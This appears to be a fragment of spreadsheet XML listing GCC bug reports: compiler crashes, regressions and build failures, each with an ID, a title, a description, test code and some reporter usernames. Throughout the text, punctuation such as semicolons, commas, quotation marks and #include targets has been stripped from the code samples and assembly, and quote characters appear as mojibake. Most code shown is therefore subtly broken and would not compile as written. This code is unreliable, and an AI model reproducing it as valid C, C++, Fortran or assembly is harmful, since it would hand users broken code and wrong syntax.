xconcat.f90: In function 'MAIN__':
xconcat.f90:4: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The program works if the line
print*[trim(x)]
is replaced with
print*[x]
or 
print*trim(x)</t>
  </si>
  <si>
    <t>GCC-31676</t>
  </si>
  <si>
    <t>[4.3 Regression] test built-in-setjmp.c fails execution with -O1</t>
  </si>
  <si>
    <t>Test gcc.c-torture/execute/built-in-setjmp.c has failed execution on powerpc*-unknown-linux-gnu with -O1 for both -m32 and -m64 since this mainline patch was added:
    http://gcc.gnu.org/viewcvs?view=rev&amp;rev=123919
    r123919 | rakdver | 2007-04-17 16:42:29 +0000 (Tue 17 Apr 2007)
It started failing in the same way on powerpc-apple-darwin8.5.0 about the same time.  Before that it had failed to compile for all torture options on Darwin.</t>
  </si>
  <si>
    <t>GCC-52180</t>
  </si>
  <si>
    <t>[DR 1227] [C++11] need to remember whether a return type was specified early or late</t>
  </si>
  <si>
    <t>template  struct A { using X = typename T::X }
template  typename T::X f(typename A::X)
template  void f(...) {}
template  auto g(typename A::X) -&gt; typename T::X
template  void g(...) {}
void h()
{
  f(0) // OK substituting return type causes deduction to fail
  g(0) // error substituting parameter type instantiates A
}</t>
  </si>
  <si>
    <t>GCC-32128</t>
  </si>
  <si>
    <t>[4.3 regression] ICE on variadic template with two parameter packs</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE on mainline:
========================================================
template struct A
template struct A {}
A a
========================================================
bug.cc:3: error: parameter pack argument 'T ...' must be at the end of the template argument list
bug.cc:5: internal compiler error: in unify at cp/pt.c:12654
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-1903</t>
  </si>
  <si>
    <t>cpp (2.95.3) does not create proper dependencies for .c++ source file extensions</t>
  </si>
  <si>
    <t>Execute
  % echo #define FOO x &gt; foo.h
  % echo #include \foo.h\\nint FOO = 1 &gt; foo.c++
  % gcc -E -Wp-M foo.c++
  foo.c++.o: foo.c++ foo.h
  %
foo.c++.o: is the wrong tag (.c++ extension is not 
recognized).
Changing the extension from .c++ to .cpp works as 
expected:
  % cp foo.c++ foo.cpp
  % gcc -E -Wp-M foo.cpp
  foo.o: foo.cpp foo.h
  %
I consider this a bug since gcc recognizes .c++ extensions
but cpp apparently not.  Invoking cpp directly with -lang-c++
doesn't help either.
-Tobias
Release:
GNU CPP version 2.95.3 19991030 (prerelease) (i386 Linux/ELF)
Environment:
Linux time.zacknetwork.com 2.2.17-21mdksmp #1 SMP Thu Oct 5 13:03:01 CEST 2000 i686 unknown
no specific environment settings
How-To-Repeat:
see above under Description</t>
  </si>
  <si>
    <t>tkunze</t>
  </si>
  <si>
    <t>GCC-81611</t>
  </si>
  <si>
    <t>[8 Regression] gcc un-learned loop / post-increment optimization</t>
  </si>
  <si>
    <t>C test case:
void func1 (unsigned char x char *str)
{
    do {
        *str++ = '0' + (x 
        x = x / 2
    } while (x)
    *str = 0
}
$ avr-gcc-8 foo.c -S -mmcu=atmega8 -O2
foo.s:
func1:
    movw r30r22     ok need the address in some
                         address register (here Z=r30)
    rjmp .L2         ???
.L3:
    movw r30r18      what the heck? Moving address back...
.L2:
    movw r18r30     ...and forth to some fresh register just to increment
    subi r18-1       the address from the *PREVIOUS* loop
    sbci r19-1       slow bloat increases reg pressure
    mov r25r24       ok
    andi r25lo8(1)   ok
    subi r25lo8(-(48))  ok
    st Zr25          Why not just st Z+ r25 ???
    lsr r24           ok
    brne .L3
    std Z+1__zero_reg__
    ret
Just for reference the code from 4.7:
* Using 5 instructions less
* Occupying 2 registers less
* Loop consumes 4 cycles less (8 instead of 12).
func1:
    movw r30r22
.L2:
    mov r25r24
    andi r25lo8(1)
    subi r25lo8(-(48))
    st Z+r25
    lsr r24
    brne .L2
    st Z__zero_reg__
    ret
That's code I expect from a 3rd millenium compiler!! -)</t>
  </si>
  <si>
    <t>GCC-83344</t>
  </si>
  <si>
    <t>Use of uninitialized memory with ASSOCIATE and strings</t>
  </si>
  <si>
    <t>Consider the testcase
subroutine foo()
  implicit none
  character(len=4) :: s
  s = a
  associate(w =&gt; trim(s))
  end associate
end subroutine foo
Compiling with gfortran -c -fdump-tree-original and looking at the 003t.original dump one can see that the length of the character variable w varies randomly from one compilation to the next. Suggestion that it's reading uninitialized memory. valgrind doesn't find anything fishy though maybe due to extensive use of unions etc. in the frontend.
Per se the 's = a' statement isn't necessary it's just there to prevent trim(s) from being non-standards compliant.
Removing the trim() call that is associating w=&gt;s directly makes this issue fo away. So the error is somehow in how the return value of trim() simplified at compile time is assigned to the length of w.
Tested with version 6.3 and trunk on x86_64 and trunk on powerpc64-unknown-linux-gnu.</t>
  </si>
  <si>
    <t>GCC-44023</t>
  </si>
  <si>
    <t>[4.6 Regression] -fcompare-debug failure (length) for alphaev67 target (bootstrap failure)</t>
  </si>
  <si>
    <t>Recent changes broke bootstrap on alphaev68-pc-linux-gnu due to stage2/3 compare failure in libiberty/sha1.o.
Soon to be attached preprocessed file triggers -fcompare-debug failure (also on a crosscompiler from x86_64-pc-linux-gnu):
~/gcc-build-alpha/gcc/xgcc -B ~/gcc-build-alpha/gcc -mcpu=ev67 -S -O2 -fcompare-debug sha1.i 
xgcc: sha1.i: -fcompare-debug failure (length)</t>
  </si>
  <si>
    <t>GCC-69209</t>
  </si>
  <si>
    <t>[6 Regression] ICE at -Os and above on x86_64-linux-gnu (verify_gimple failed)</t>
  </si>
  <si>
    <t>The following code causes an ICE when compiled with the current gcc trunk at -Os and above on x86_64-linux-gnu in both 32-bit and 64-bit modes.
It is a regression from 5.3.x. 
Possibly related to PR 69083 which has just been fixed. 
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/usr/local/gcc-trunk --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 6.0.0 20160108 (experimental) [trunk revision 232154] (GCC) 
$ 
$ gcc-trunk -O1 -c small.c
$ gcc-5.3 -Os -c small.c
$ 
$ gcc-trunk -Os -c small.c
small.c: In function â€˜fn1â€™:
small.c:24:1: error: invalid operand in return statement
 }
 ^
f
# VUSE 
return f
small.c:24:1: internal compiler error: verify_gimple failed
0xb30566 verify_gimple_in_cfg(function* bool)
	../../gcc-trunk/gcc/tree-cfg.c:5119
0xa24257 execute_function_todo
	../../gcc-trunk/gcc/passes.c:1958
0xa24b4b execute_todo
	../../gcc-trunk/gcc/passes.c:2010
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
------------------------------------------------------
int a c *d e
void __assert_fail () __attribute__ ((__noreturn__))
int
fn1 ()
{
  int f
  if (a)
    {
      if (e)
	__assert_fail ()
      __assert_fail ()
    }
  d == 
  c ? (void) 0 : __assert_fail ()
  return f
}
void
fn2 ()
{
  fn1 ()
}</t>
  </si>
  <si>
    <t>GCC-55039</t>
  </si>
  <si>
    <t>std::addressof vs. constexpr</t>
  </si>
  <si>
    <t>If std::addressof can be made constexpr then the iterator member functions of std::array should be able to be made constexpr as well (begin/end etc.)
As it stands std::addressof calls into std::__addressof which has a reinterpret_cast killing constexpr. 
If some variation of
http://gcc.gnu.org/onlinedocs/gcc/Return-Address.html
could be extended to support this then the new intrinsic could be used to implement std::addressof.</t>
  </si>
  <si>
    <t>GCC-69516</t>
  </si>
  <si>
    <t>[5/6 regression] infinite recursion on a VLA with excess initializer elements in constexpr function</t>
  </si>
  <si>
    <t>GCC gets itself into infinite recursion compiling the following test case derived derived from the one shown in the discussion of a patch for bug 69496 (https://gcc.gnu.org/ml/gcc-patches/2016-01/msg02098.html).  See also bug 69509 (which might be the same problem.)
The same problem exists in 5.x.  4.9.3 doesn't suffer from it because it doesn't implement the more relaxed C++ 14 constexpr rules and rejects constexpr functions that consist of more than just a return statement.
$ (cat t.c &amp;&amp; ulimit -t 10 &amp;&amp; /home/msebor/build/gcc-trunk-svn/gcc/xgcc -B/home/msebor/build/gcc-trunk-svn/gcc  -Wall -Wextra -Wpedantic -std=c++14 -xc++ t.c)
constexpr int foo (int n)
{
     int a[n] = { 1 2 3 4 5 6 }
     int z = 0
     for (unsigned i = 0 i &lt; 3 ++i)
       z += a[i]
     return z
}
int main ()
{
   constexpr int n = foo (3)
   __builtin_printf (%d\n n)
}
t.c: In function â€˜constexpr int foo(int)â€™:
t.c:3:13: warning: ISO C++ forbids variable length array â€˜aâ€™ [-Wvla]
      int a[n] = { 1 2 3 4 5 6 }
             ^
xgcc: internal compiler error: Killed (program cc1plus)
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-21274</t>
  </si>
  <si>
    <t>SSA Crash reproducable</t>
  </si>
  <si>
    <t>The g++-4.0 in the Ubuntu Hoary repository crashes on the following file.
------- crash-4.0.cc starts here ---------------------------------------
/*
prompt&gt; g++-4.0 -msse2 -O3 -ftree-vectorize -ftree-vectorizer-verbose=5 -c
crash-4.0.cc
crash-4.0.cc:11: note: Alignment of access forced using peeling.
crash-4.0.cc:11: note: LOOP VECTORIZED.
crash-4.0.cc:26: note: Alignment of access forced using peeling.crash-4.0.cc: In
function â€˜DenseMatrix* mat_identity(int)â€™:
crash-4.0.cc:21: internal compiler error: in gimplify_expr at gimplify.c:4070
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
For Debian GNU/Linux specific bug reporting instructions
see .
prompt&gt; g++-4.0 --version
 g++-4.0 (GCC) 4.0.0 20050301 (prerelease) (Debian 4.0-0pre6ubuntu7)
Copyright (C) 2005 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
prompt&gt; uname -a
Linux tamale 2.6.10-5-amd64-generic #1 Tue Apr 5 12:21:57 UTC 2005 x86_64 GNU/Linux
*/
class DenseMatrix
{
  int rows_ cols_
  double *ptr_
public:
  DenseMatrix(int nr int nc) : rows_(nr) cols_(nc)
  {
    ptr_ = new double[nr * nc]
  }
  void zero() { for (int i = 0 i &lt; rows_ * cols_ i++) ptr_[i] = 0.0 } 
  inline double* operator[](int r)
  {
    return ptr_ + r * cols_
  }
}
//! Create Identity Matrix
DenseMatrix *mat_identity(int len) 
{
  DenseMatrix *eye = new DenseMatrix(len len)
  eye-&gt;zero()
  for (int i=0 i&lt;len i++)
  {
    (*eye)[i][i]=1
  }
  return eye
}</t>
  </si>
  <si>
    <t>callahan</t>
  </si>
  <si>
    <t>GCC-10949</t>
  </si>
  <si>
    <t>Internal compiler error in instantiate_virtual_regs_1</t>
  </si>
  <si>
    <t>(ICE on both 3.2.2 and 3.2.3)
The following code produces an ICE:
long die(int n) {
    long res
    __asm__ volatile (int $0x80:=eax(res):eax(n))
    return res
}
bug.cc: In function `long int die(int)':
bug.cc:6: Internal compiler error in instantiate_virtual_regs_1 at function.c: 3971
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The workaround is to change eax into a.</t>
  </si>
  <si>
    <t>jerome.abela</t>
  </si>
  <si>
    <t>GCC-6767</t>
  </si>
  <si>
    <t>make gnatlib-shared fails on -laddr2line</t>
  </si>
  <si>
    <t>$ make CC=gcc3 CFLAGS=-O2 LIBCFLAGS=-O2 LIBCXXFLAGS='-O2 -fno-implicit-templates' GNATLIBCFLAGS=-O2 gnatlib-shared
....
make[4]: Leaving directory `/home/lbrenta/src/gcc-obj/gcc/ada'
rm -f rts/libgnat.so rts/libgnarl.so
cd rts ../../xgcc -B../../ -shared -fPIC \
	-o libgnat-3.15a.so -Wl-sonamelibgnat-3.15a.so \
	a-caldel.o a-calend.o a-chahan.o a-charac.o a-chlat1.o a-colien.o a-colire.o a-comlin.o a-cwila1.o a-decima.o a-einuoc.o a-except.o a-exctra.o a-filico.o a-finali.o a-flteio.o a-fwteio.o a-inteio.o a-ioexce.o a-iwteio.o a-lfteio.o a-lfwtio.o a-liteio.o a-liwtio.o a-llftio.o a-llfwti.o a-llitio.o a-lliwti.o a-ncelfu.o a-nlcefu.o a-nlcoty.o a-nlelfu.o a-nllcef.o a-nllcty.o a-nllefu.o a-nscefu.o a-nscoty.o a-nselfu.o a-nucoty.o a-nuelfu.o a-nuflra.o a-numaux.o a-numeri.o a-sfteio.o a-sfwtio.o a-siteio.o a-siwtio.o a-ssicst.o a-ssitio.o a-ssiwti.o a-stmaco.o a-strbou.o a-stream.o a-strfix.o a-string.o a-strmap.o a-strsea.o a-strunb.o a-ststio.o a-stunau.o a-stwibo.o a-stwifi.o a-stwima.o a-stwise.o a-stwiun.o a-suteio.o a-swuwti.o a-swmwco.o a-tags.o a-teioed.o a-textio.o a-ticoau.o a-tideau.o a-tienau.o a-tiflau.o a-tigeau.o a-tiinau.o a-timoau.o a-tiocst.o a-titest.o a-witeio.o a-wtcoau.o a-wtcstr.o a-wtdeau.o a-wtedit.o a-wtenau.o a-wtflau.o a-wtgeau.o a-wtinau.o a-wtmoau.o a-wttest.o ada.o calendar.o g-awk.o g-busora.o g-calend.o g-casuti.o g-catiio.o g-cgi.o g-cgicoo.o g-cgideb.o g-comlin.o g-crc32.o g-curexc.o g-debuti.o g-debpoo.o g-diopit.o g-dirope.o g-except.o g-exctra.o g-expect.o g-flocon.o g-hesora.o g-htable.o g-io.o g-io_aux.o g-locfil.o g-moreex.o g-os_lib.o g-regexp.o g-regpat.o g-soccon.o g-socket.o g-socthi.o g-soliop.o g-souinf.o g-speche.o g-spipat.o g-spitbo.o g-sptabo.o g-sptain.o g-sptavs.o g-tasloc.o g-traceb.o g-trasym.o gnat.o i-c.o i-cexten.o i-cobol.o i-cpp.o i-cstrea.o i-cstrin.o i-fortra.o i-pacdec.o interfac.o ioexcept.o machcode.o s-addima.o s-arit64.o s-assert.o s-auxdec.o s-bitops.o s-chepoo.o s-crc32.o s-direio.o s-errrep.o s-except.o s-exctab.o s-exnflt.o s-exngen.o s-exnint.o s-exnlfl.o s-exnlin.o s-exnllf.o s-exnlli.o s-exnsfl.o s-exnsin.o s-exnssi.o s-expflt.o s-expgen.o s-expint.o s-explfl.o s-explin.o s-expllf.o s-explli.o s-expllu.o s-expmod.o s-expsfl.o s-expsin.o s-expssi.o s-expuns.o s-fatflt.o s-fatlfl.o s-fatllf.o s-fatsfl.o s-ficobl.o s-fileio.o s-finimp.o s-finroo.o s-fore.o s-imgbiu.o s-imgboo.o s-imgcha.o s-imgdec.o s-imgenu.o s-imgint.o s-imgllb.o s-imglld.o s-imglli.o s-imgllu.o s-imgllw.o s-imgrea.o s-imguns.o s-imgwch.o s-imgwiu.o s-io.o s-gloloc.o s-maccod.o s-mantis.o s-mastop.o s-osprim.o s-pack03.o s-pack05.o s-pack06.o s-pack07.o s-pack09.o s-pack10.o s-pack11.o s-pack12.o s-pack13.o s-pack14.o s-pack15.o s-pack17.o s-pack18.o s-pack19.o s-pack20.o s-pack21.o s-pack22.o s-pack23.o s-pack24.o s-pack25.o s-pack26.o s-pack27.o s-pack28.o s-pack29.o s-pack30.o s-pack31.o s-pack33.o s-pack34.o s-pack35.o s-pack36.o s-pack37.o s-pack38.o s-pack39.o s-pack40.o s-pack41.o s-pack42.o s-pack43.o s-pack44.o s-pack45.o s-pack46.o s-pack47.o s-pack48.o s-pack49.o s-pack50.o s-pack51.o s-pack52.o s-pack53.o s-pack54.o s-pack55.o s-pack56.o s-pack57.o s-pack58.o s-pack59.o s-pack60.o s-pack61.o s-pack62.o s-pack63.o s-parame.o s-parint.o s-pooglo.o s-pooloc.o s-poosiz.o s-powtab.o s-rpc.o s-scaval.o s-secsta.o s-sequio.o s-shasto.o s-sopco3.o s-sopco4.o s-sopco5.o s-stache.o s-stalib.o s-stoele.o s-stopoo.o s-stratt.o s-strops.o s-soflin.o s-memory.o s-traceb.o s-unstyp.o s-vaflop.o s-valboo.o s-valcha.o s-valdec.o s-valenu.o s-valint.o s-vallld.o s-vallli.o s-valllu.o s-valrea.o s-valuns.o s-valuti.o s-valwch.o s-vercon.o s-vmexta.o s-wchcnv.o s-wchcon.o s-wchjis.o s-wchstw.o s-wchwts.o s-widboo.o s-widcha.o s-widenu.o s-widlli.o s-widllu.o s-widwch.o s-wwdcha.o s-wwdenu.o s-wwdwch.o system.o text_io.o  adaint.o argv.o cio.o cstreams.o errno.o exit.o raise.o sysdep.o io-aux.o init.o cal.o final.o tracebak.o expect.o ../../prefix.o  -laddr2line -lbfd -lm
/usr/bin/ld: cannot find -laddr2line
I tried to remove libaddr2line from the MISCLIB variable and I can now compile the shared library. However I cannot link hello world against it:
$ export CC=/opt/gcc-3.1/bin
$ $CC/gcc31 -c hello_world.adb
$ $CC/gnatbind -shared hello_world
$ $CC/gnatlink --GCC=$CC/gcc31 hello_world
/opt/gcc-3.1/lib/gcc-lib/i686-pc-linux-gnu/3.1/adalib//libgnat.so: undefined reference to `xmalloc'
/usr/lib/libbfd-2.11.90.0.8.so: undefined reference to `objalloc_create'
/usr/lib/libbfd-2.11.90.0.8.so: undefined reference to `xstrerror'
/usr/lib/libbfd-2.11.90.0.8.so: undefined reference to `hex_init'
/opt/gcc-3.1/lib/gcc-lib/i686-pc-linux-gnu/3.1/adalib//libgnat.so: undefined reference to `concat'
/usr/lib/libbfd-2.11.90.0.8.so: undefined reference to `htab_find_slot_with_hash'
/opt/gcc-3.1/lib/gcc-lib/i686-pc-linux-gnu/3.1/adalib//libgnat.so: undefined reference to `xstrdup'
/usr/lib/libbfd-2.11.90.0.8.so: undefined reference to `_objalloc_alloc'
/usr/lib/libbfd-2.11.90.0.8.so: undefined reference to `_hex_value'
/opt/gcc-3.1/lib/gcc-lib/i686-pc-linux-gnu/3.1/adalib//libgnat.so: undefined reference to `convert_addresses'
/usr/lib/libbfd-2.11.90.0.8.so: undefined reference to `htab_create'
/usr/lib/libbfd-2.11.90.0.8.so: undefined reference to `objalloc_free_block'
/usr/lib/libbfd-2.11.90.0.8.so: undefined reference to `objalloc_free'
/usr/lib/libbfd-2.11.90.0.8.so: undefined reference to `xexit'
/usr/lib/libbfd-2.11.90.0.8.so: undefined reference to `htab_delete'
collect2: ld returned 1 exit status
gnatlink: cannot call /opt/gcc-3.1/bin/gcc31
As a result I am forced to link statically.
Release:
gcc 3.1 (release)
Environment:
Red Hat Linux 7.2 no patches.
Linux 2.4.7-10 #1 i686 unknown
gcc3-3.0.1-3 installed
gcc-2.96 not installedbinutils-2.11.90.0.8-9 has addr2line but no libaddr2line.{soa}
How-To-Repeat:
$ cd ~/src/gcc-obj/gcc
$ make CC=gcc3 bootstrap gnatlib-shared</t>
  </si>
  <si>
    <t>GCC-18332</t>
  </si>
  <si>
    <t>mmix-knuth-mmixware testsuite failure: gcc.dg/compat/vector-1 c_compat_x_tst.o-c_compat_y_tst.o execute</t>
  </si>
  <si>
    <t>This test has never worked on this target where the port lacks vector insns
(the target actually has them but the point is that the open-code variant
should work alternatively the test should not try to execute.)
It used to be a compilation failure for example with
Fri Jul 4 22:17:01 GMT 2003 as
PASS: gcc.dg/compat/vector-1 c_compat_main_tst.o compile
FAIL: gcc.dg/compat/vector-1 c_compat_x_tst.o compile
FAIL: gcc.dg/compat/vector-1 c_compat_y_tst.o compile
(rest unresolved) then with Thu Oct 9 03:06:11 GMT 2003 as
PASS: gcc.dg/compat/vector-1 c_compat_x_tst.o compile
PASS: gcc.dg/compat/vector-1 c_compat_y_tst.o compile
PASS: gcc.dg/compat/vector-1 c_compat_x_tst.o-c_compat_y_tst.o link
FAIL: gcc.dg/compat/vector-1 c_compat_x_tst.o-c_compat_y_tst.o execute
which is the same as today
with LAST_UPDATED: Sat Nov  6 19:25:03 GMT 2004 I get:
FAIL: gcc.dg/compat/vector-1 c_compat_x_tst.o-c_compat_y_tst.o execute
with the message in the .log being:
*** EXIT code 4242
(an abort call)</t>
  </si>
  <si>
    <t>GCC-7087</t>
  </si>
  <si>
    <t>sub-make FLAG propagation fails if flag ends with '='</t>
  </si>
  <si>
    <t>The top-level Makefile.in (and others?) propagates some flags to sub-make by saying e.g.
    `echo 'STAGE1_CFLAGS=$(STAGE1_CFLAGS)' | sed -e s/.*=$$/XFOO=/`
This fails to propagate the value if I've done e.g.
    make STAGE1_CFLAGS=-O2 -Dinline=' bootstrap-lean
Release:
3.1
Environment:
all
How-To-Repeat:
make STAGE1_CFLAGS=-O2 -Dinline=' bootstrap-lean</t>
  </si>
  <si>
    <t>sdouglass</t>
  </si>
  <si>
    <t>GCC-78018</t>
  </si>
  <si>
    <t>[C++14] internal compiler error: Segmentation fault with templates and lambdas</t>
  </si>
  <si>
    <t>Created attachment 39828
Minimal working example for triggering the crash
Trying to compile the minimal working example that is attached the compiler crashes with a segfault. The exact output is stated below. The code should be correct as other compilers like Clang have no problem in compiling it.
Note that the bug does not occur if all methods of A are declared inline. Also note that removing one element of the template-lambda call chain the bug does not occur neither.
Command line: g++ -std=c++14 -c error.cpp
The error that is thrown is:
error.cpp: In member function â€˜void A::f2(F) [with F = A::f1()::]â€™:
error.cpp:24:6: internal compiler error: Segmentation fault
 void A::f2(F f)
      ^
0xad48ef crash_signal
	../../src/gcc/toplev.c:333
0xd286ba wi::extended_tree::get_len() const
	../../src/gcc/tree.h:5268
0xd286ba wi::int_traits &gt; &gt;::decompose(long* unsigned int generic_wide_int &gt; const&amp;)
	../../src/gcc/wide-int.h:898
0xd286ba wide_int_ref_storage::wide_int_ref_storage &gt; &gt;(generic_wide_int &gt; const&amp; unsigned int)
	../../src/gcc/wide-int.h:945
0xd286ba generic_wide_int &gt;::generic_wide_int &gt; &gt;(generic_wide_int &gt; const&amp; unsigned int)
	../../src/gcc/wide-int.h:722
0xd286ba wi::unary_traits &gt; &gt;::result_type wi::lshift &gt; int&gt;(generic_wide_int &gt; const&amp; int const&amp;)
	../../src/gcc/wide-int.h:2847
0xd286ba int_bit_position(tree_node const*)
	../../src/gcc/tree.h:5377
0xd286ba classify_argument
	../../src/gcc/config/i386/i386.c:8095
0xd28b89 examine_argument
	../../src/gcc/config/i386/i386.c:8409
0xd28de6 function_arg_advance_64
	../../src/gcc/config/i386/i386.c:8822
0xd28de6 ix86_function_arg_advance
	../../src/gcc/config/i386/i386.c:8915
0x8afd94 gimplify_parameters()
	../../src/gcc/function.c:3999
0x8e5ef4 gimplify_body(tree_node* bool)
	../../src/gcc/gimplify.c:11522
0x8e6097 gimplify_function_tree(tree_node*)
	../../src/gcc/gimplify.c:11682
0x7c5087 cgraph_node::analyze()
	../../src/gcc/cgraphunit.c:625
0x7c7a2f analyze_functions
	../../src/gcc/cgraphunit.c:1086
0x7c81a8 symbol_table::finalize_compilation_unit()
	../../src/gcc/cgraphunit.c:2542</t>
  </si>
  <si>
    <t>andipeer</t>
  </si>
  <si>
    <t>GCC-31209</t>
  </si>
  <si>
    <t>too much indirection for actual pointer procedure</t>
  </si>
  <si>
    <t>With a recent gfortran the following compiles but generates the wrong results:
FUNCTION F() RESULT(RES)
 INTEGER POINTER :: RES
 ALLOCATE(RES)
 RES=2
END FUNCTION F
SUBROUTINE S1(f**)
 INTERFACE
  FUNCTION F() RESULT(RES)
   INTEGER POINTER :: RES
  END FUNCTION F
 END INTERFACE
 RETURN F()
END SUBROUTINE
PROGRAM TEST
   INTERFACE
    FUNCTION F() RESULT(RES)
     INTEGER POINTER :: RES
    END FUNCTION F
   END INTERFACE
   INTERFACE
    SUBROUTINE S1(f**)
      INTERFACE
       FUNCTION F() RESULT(RES)
        INTEGER POINTER :: RES
       END FUNCTION F
      END INTERFACE
     END SUBROUTINE
   END INTERFACE
   CALL S1(F*1*2)
   1 CONTINUE
   CALL ABORT()
   GOTO 3
   2 CONTINUE
   3 CONTINUE
END</t>
  </si>
  <si>
    <t>GCC-25232</t>
  </si>
  <si>
    <t>libgcc-std.ver should include __unordxf2 and __unordtf2</t>
  </si>
  <si>
    <t>libgcc-std.ver includes __unordsf2 and __unorddf2.  It should also include __unordxf2 and __unordtf2 (in an appropriate version for when they get added - GCC_4.2.0 if added mainline only GCC_4.1.0 or GCC_4.0.3 or GCC_3.4.6 if also added to a release branch not GCC_3.3.4 alongside __unordsf2 and __unorddf2).</t>
  </si>
  <si>
    <t>GCC-4787</t>
  </si>
  <si>
    <t>Different anonymous variables declared but only one allocated when the initialization is the same</t>
  </si>
  <si>
    <t>The execution of the following code (same as attached file) compiled with gcc:
   struct x    { int       i }
   int     main ()
   {
       struct  { struct x  *x } a = { 
       struct  { struct x  *x } b = { 
       struct  { struct x  *x } c = { 
       printf (a.x: %p\n a.x)
       printf (b.x: %p\n b.x)
       printf (c.x: %p\n c.x)
       return (0)
   }
generates the following output:
   a.x: 400010e0
   b.x: 400010e0
   c.x: 400010e4
The struct x of variables a and b are the sames (same address) but they shouldn't. They are different only if the initialisation value is different (variable c).
Anonymous variables with the same initialisation seems to be abusively merged .
Release:
gcc version 3.0.2 and  2.95.2 (at least)
Environment:
HP-UX  V 11.00
How-To-Repeat:
gcc f.c
./a.out</t>
  </si>
  <si>
    <t>walle</t>
  </si>
  <si>
    <t>GCC-16889</t>
  </si>
  <si>
    <t>[3.4 Regression] ambiguity is not detected</t>
  </si>
  <si>
    <t>Ambiguity is not detected in this code:
// start of code
class B {
public:
    B* p
    B* f()
    virtual ~B()
}
class B1 : virtual public B {
}
class B2 : virtual public B {
}
class B3 : public B {
}
class BB : public B1 public B2 public B3 {
}
#include 
B*
B::f ()
{
    std::cout &lt;&lt; this &lt;&lt; std::endl
    return this
}
B::~B()
{
    std::cout &lt;&lt; this &lt;&lt; .~B() &lt;&lt; std::endl
}
int
main ()
{
    BB b
    b.B1::f()
    b.B2::f()
    b.B3::f()
    b.f()
}
// end of code
2.95.3 correctly rejects this code.</t>
  </si>
  <si>
    <t>dvv</t>
  </si>
  <si>
    <t>GCC-755</t>
  </si>
  <si>
    <t>Unitialized variable in cse_insn</t>
  </si>
  <si>
    <t>Compiler does not bootstrap clean due to uninitialized	
variable in cse. Depending on the of the optimization of the 
host compiler the produced compiler delivers different code.
The variable is 'src_folded_regcost' in cse.c. The compiler
is complains that this variable could be used uninitialized.
The variable is only set if src_folded is set but is always
used.
Release:
egcs-20001109
Environment:
gcc s390 backend</t>
  </si>
  <si>
    <t>GCC-78616</t>
  </si>
  <si>
    <t>Poison strndup in system.h</t>
  </si>
  <si>
    <t>longest backtrack:       17 (code:    156)
Shared 29773 out of 59469 states by creating 7857 new states saving 21916
/src/gcc-trunk/gcc/selftest.c: In function 'void selftest::assert_strndup_eq(const char* const char* size_t)':
/src/gcc-trunk/gcc/selftest.c:209:30: error: 'strndup' was not declared in this scope
   char *buf = strndup (src n)
                              ^
make[3]: *** [selftest.o] Error 1
make[3]: *** Waiting for unfinished jobs....
make[2]: *** [all-stage1-gcc] Error 2
make[1]: *** [stage1-bubble] Error 2
The bootstrap compiler has a sysroot suitable for Darwin10 (which doesn't have strndup strnlen etc.)</t>
  </si>
  <si>
    <t>GCC-46894</t>
  </si>
  <si>
    <t>[4.6 Regression] vector tests fail on powerpc 32-bit</t>
  </si>
  <si>
    <t>Created attachment 22716
asm files for r165239 (OK) and r165240 (fails) for reduced testcase
the commit of :
http://gcc.gnu.org/ml/gcc-cvs/2010-10/msg00423.html
caused:
FAIL: gcc.dg/compat/vector-1 c_compat_x_tst.o-c_compat_y_tst.o execute 
FAIL: gcc.dg/compat/vector-2 c_compat_x_tst.o-c_compat_y_tst.o execute 
FAIL: tmpdir-gcc.dg-struct-layout-1/t025 c_compat_x_tst.o-c_compat_y_tst.o execute 
FAIL: tmpdir-gcc.dg-struct-layout-1/t027 c_compat_x_tst.o-c_compat_y_tst.o execute 
FAIL: tmpdir-gcc.dg-struct-layout-1/t028 c_compat_x_tst.o-c_compat_y_tst.o execute 
at m32 on powerpc-darwin9 [tests are OK at m64].
I've reduced the first fail in gcc.dg/compat/vector-1
 &gt;&gt; TEST (32 qi 90)
 (attaching asm files).
There are no changes in the .i files between the revisions 165239 and 165240.</t>
  </si>
  <si>
    <t>GCC-8676</t>
  </si>
  <si>
    <t>ICE in generate_bytecode_conditional at jcf-write.c:1359</t>
  </si>
  <si>
    <t>When compiling to .class files I get:
internal compiler error: in generate_bytecode_conditional at java/jcf-write.c:1359
It works fine when compiling to native code.
 cat Foo.java  
public class Foo {
    private void f(long j) {
        boolean x = (1 &lt;&lt; j) != 0
    }
}
 gcj -C Foo.java               
Foo.java: In class `Foo':
Foo.java: In method `Foo.f(long)':
Foo.java:3: internal compiler error: in generate_bytecode_conditional at java/jcf-write.c:1359
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
gcc version 3.3 20021121 (experimental)</t>
  </si>
  <si>
    <t>GCC-40247</t>
  </si>
  <si>
    <t>[4.5 Regression]  Revision 147848 failed gcc.dg/struct/wo_prof_escape_substr_pointer.c</t>
  </si>
  <si>
    <t>Revision 147848:
http://gcc.gnu.org/ml/gcc-cvs/2009-05/msg00825.html
caused:
FAIL: gcc.dg/struct/wo_prof_escape_substr_pointer.c scan-ipa-dump ipa_struct_reorg is a field in the structure</t>
  </si>
  <si>
    <t>GCC-7282</t>
  </si>
  <si>
    <t>unrecognizable insn</t>
  </si>
  <si>
    <t>stuart.c: In function `testcase':
stuart.c:170: unrecognizable insn:
(insn 789 199 203 (set (subreg:SI (reg:DI 38 f6) 4)
        (mem:SI (plus:DI (reg/f:DI 1 r1)
                (const_int 116 [0x74])) [15 S4 A8])) -1 (nil)
    (nil))
stuart.c:170: Internal compiler error in extract_insn at recog.c:2148
Release:
3.1.1 20020711 (prerelease)
Environment:
